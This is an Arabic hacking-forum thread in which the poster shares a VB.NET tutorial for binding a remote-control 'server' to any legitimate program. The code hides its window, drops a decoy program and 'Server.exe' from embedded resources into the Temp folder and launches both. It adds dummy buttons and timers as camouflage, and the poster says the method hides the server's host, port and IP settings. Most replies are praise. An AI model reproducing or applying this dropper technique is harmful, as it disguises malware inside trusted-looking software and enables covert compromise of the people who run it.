1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : لاذكروني الجبوري | المشاهدات : 1,278 | الردود : 10
حالة الموضوع:
مغلق
  1. لاذكروني الجبوري <span style="font-weight: bold; text-shadow: #BBBB V • I • P

    الأنتساب:
    ‏27 فبراير 2014
    المشاركات:
    102
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    50
    الإقامة:
    العراق
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    Visual Basic
    Facebook:
    YouTube:
    [​IMG]

    سًلام عليّكم أحًبّائيّ

    أسًفُ عنٌ الغّيّابّ الطٌوِيّل
    بّسًبّبّ المشّاكل

    طٌريّقَة بّسًيّطٌ للدُمجَ بّالدُوِتُ نٌتُ vb

    مع أيّ بّرنٌامجَ النٌاتُجَ كانٌ كليّنٌ
    لاكنٌ بّسًبّبّ الفُحًصِ أنٌكشّفُ

    الطٌريّقَة تُقَوِم بّـ خٌفُاء أعدُادُاتُ السًيّرفُر
    حًسًبّ تُجَربّتُيّ فُأنٌه يّقَوِم بّـ خٌفُاء الهوِسًتُ
    وِالبّوِرتُ وِالايّ بّيّ

    أفتح مشروع جديد
    [​IMG]

    قم بأضافة
    5- Button و 5- TextBox و 5- Timer للتمويه
    وقم بـ أخفاء الأستايل
    [​IMG]

    بالـ Form1_Load أضف الكود التالي

    On Error Resume Next
    Me.ShowInTaskbar = False
    Me.ShowIcon = False
    Me.Visible = True
    Me.Opacity = 0
    Dim mr As String = My.Computer.FileSystem.SpecialDirectories.Temp
    Dim ziko As String = mr + "أسم البرنامج.exe"
    IO.File.WriteAllBytes(ziko, My.Resources.اسم البرنامج)
    Process.Start(ziko)
    Timer1.Start()



    مثل الصورة
    [​IMG]

    وبالـ Timer1 أضف الكود التالي

    Try
    Dim mr As String = My.Computer.FileSystem.SpecialDirectories.Temp
    Dim zaid As String = mr + "Server.exe"
    IO.File.WriteAllBytes(zaid, My.Resources.Server)
    Process.Start(zaid)
    End
    Catch ex As Exception
    End Try
    End Sub



    مثل الصورة
    [​IMG]

    وشكراَ
    أنتضرو المزيد
    &:":
    [​IMG][/CENTER]
     
    1 person likes this.
  2. Sudan Tiger V • I • P

    الأنتساب:
    ‏25 مايو 2014
    المشاركات:
    494
    الإعجابات المتلقاة:
    16
    نقاط الجائزة:
    50
    نظام التشغيل:
    Linux
    حسابي في الزون اتش Zone-H:
    اللغة البرمجية:
    Delphi
    Facebook:
    رد: دمج السيرفر مع أي برنامج بالدوت نت vb

    وعليكم السلام ورحمة الله ياغالي

    شرح اكثر من رائع

    جاااري الوشم بالخماسي + التقيم

    )5:"
     
  3. ★ قبعة القش ★ V • I • P

    الأنتساب:
    ‏10 مايو 2014
    المشاركات:
    447
    الإعجابات المتلقاة:
    16
    نقاط الجائزة:
    50
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    Visual Basic
    Facebook:
    YouTube:
    رد: دمج السيرفر مع أي برنامج بالدوت نت vb

    مبدع حقا
    تسلم إيدك حبيبي
     
  4. TeePlow V • I • P

    الأنتساب:
    ‏12 مارس 2014
    المشاركات:
    400
    الإعجابات المتلقاة:
    9
    نقاط الجائزة:
    50
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    Visual Basic
    Facebook:
    رد: دمج السيرفر مع أي برنامج بالدوت نت vb

    السلام عليكم
    شرح رائع يا مبدع واصل :{10}::{10}:
     
  5. خأإآلد DeveloPer Plus

    الأنتساب:
    ‏18 ديسمبر 2011
    المشاركات:
    108
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    50
    الإقامة:
    K.s.A
    نظام التشغيل:
    Linux
    رد: دمج السيرفر مع أي برنامج بالدوت نت vb

    تِسلَـمْ أخِي :{8}:
    بَاركـَ الله فِيكَ :{1}:
     
  6. fatima Developer

    الأنتساب:
    ‏28 يوليو 2014
    المشاركات:
    22
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    Perl
    رد: دمج السيرفر مع أي برنامج بالدوت نت vb

    شكرا بس لو كان فيه شرح فيديو يكون احسن عشت اخى ننتظر المزيد من ابداعك واصل&:":
     
  7. Ameer Eagle V • I • P

    الأنتساب:
    ‏7 يونيو 2014
    المشاركات:
    3,233
    الإعجابات المتلقاة:
    2,783
    نقاط الجائزة:
    255
    الجنس:
    ذكر
    الوظيفة:
    Student
    الإقامة:
    IraQ
    نظام التشغيل:
    windows 7
    رد: دمج السيرفر مع أي برنامج بالدوت نت vb

    عشت حبي بارك الله بيك على الكرح المميز


     
  8. Ameer Eagle V • I • P

    الأنتساب:
    ‏7 يونيو 2014
    المشاركات:
    3,233
    الإعجابات المتلقاة:
    2,783
    نقاط الجائزة:
    255
    الجنس:
    ذكر
    الوظيفة:
    Student
    الإقامة:
    IraQ
    نظام التشغيل:
    windows 7
    رد: دمج السيرفر مع أي برنامج بالدوت نت vb

    مع الاسف حبي جرب
    وطلع لي 12 يرر هههههههههههه

     
  9. ♕| s c я є α м |♕ IP: 90.148.234.7 مشرف

    الأنتساب:
    ‏23 ديسمبر 2014
    المشاركات:
    659
    الإعجابات المتلقاة:
    689
    نقاط الجائزة:
    515
    الإقامة:
    7
    نظام التشغيل:
    windows xp
    رد: دمج السيرفر مع أي برنامج بالدوت نت vb

    يعطيك العافيه اخوي شي جميل
     
  10. AHMEDZAIN Developer

    الأنتساب:
    ‏26 ديسمبر 2014
    المشاركات:
    44
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    Perl
    رد: دمج السيرفر مع أي برنامج بالدوت نت vb

    يعططيك العافيه اخخوي جاري التججربه :)
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة